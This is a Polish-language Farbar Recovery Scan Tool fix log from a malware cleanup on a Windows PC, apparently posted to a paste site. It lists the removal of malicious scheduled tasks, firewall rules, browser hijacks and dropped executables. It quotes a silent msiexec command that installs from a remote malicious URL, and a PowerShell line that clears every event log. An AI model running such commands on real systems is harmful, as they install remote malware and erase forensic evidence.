Facebook
From Jai Kumar, 5 Years ago, written in Plain Text.
Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 11.03.2019
Uruchomiony przez joannas (13-03-2019 20:00:36) Run:1
Uruchomiony z C:\Users\joannas\Downloads
Załadowane profile: joannas (Dostępne profile: joannas)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************


        CloseProcesses:
        ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
        ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =>  -> Brak pliku
        ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
        ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =>  -> Brak pliku
        ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
        ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
        ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
        Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
        Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
        Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
        FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
        FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
        C:\Program Files (x86)\Common Files\INhrB.exe
        C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
        FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
        FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
        FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
        FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
        1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
        1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
        2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
        HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
        SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
        BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
        Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
        2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
        2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
        2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
        CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
        CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
        S3 mfeavfk04; \Device\mfeavfk04.sys [X]
        Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
        EmptyTemp:


*****************

Procesy zostały pomyślnie zamknięte.
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
"HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}" => pomyślnie usunięto
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => nie znaleziono
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D} => nie znaleziono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3543EE5D-FE99-AD25-23F5-03742BD2251B}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54D55C0D-2609-A62F-A35D-C02F1C8F7189}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}" => pomyślnie usunięto
C:\Program Files (x86)\Common Files\INhrB.exe => pomyślnie przeniesiono
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe => pomyślnie przeniesiono
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64503A19-D801-4A3B-80ED-4916B76F6D5E}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0590994E-2B06-4CFF-89E8-0D5AE7939375}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"C:\Program Files (x86)\Common Files\INhrB.exe" => nie znaleziono
C:\Users\joannas\AppData\Local\ieauOreoYaK.exe => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\wbem.ini => pomyślnie przeniesiono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
"HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => nie znaleziono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => nie znaleziono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => pomyślnie usunięto
C:\ProgramData\localNETService => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\Mail.Ru => pomyślnie przeniesiono
C:\ProgramData\Mail.Ru => pomyślnie przeniesiono
HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\mfeavfk04 => pomyślnie usunięto
mfeavfk04 => serwis pomyślnie usunięto

========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========


========= Koniec  Powershell: =========


=========== EmptyTemp: ==========

BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 881544853 B
Java, Flash, Steam htmlcache => 1568 B
Windows/system/drivers => 733723 B
Edge => 6036248 B
Chrome => 0 B
Firefox => 946688712 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 12732255 B
systemprofile32 => 0 B
LocalService => 48150 B
LocalService => 0 B
NetworkService => 52568 B
NetworkService => 0 B
joannas => 108308419 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB danych tymczasowych Usunięto.

================================


System wymagał restartu.

==== Koniec  Fixlog 20:02:18 ====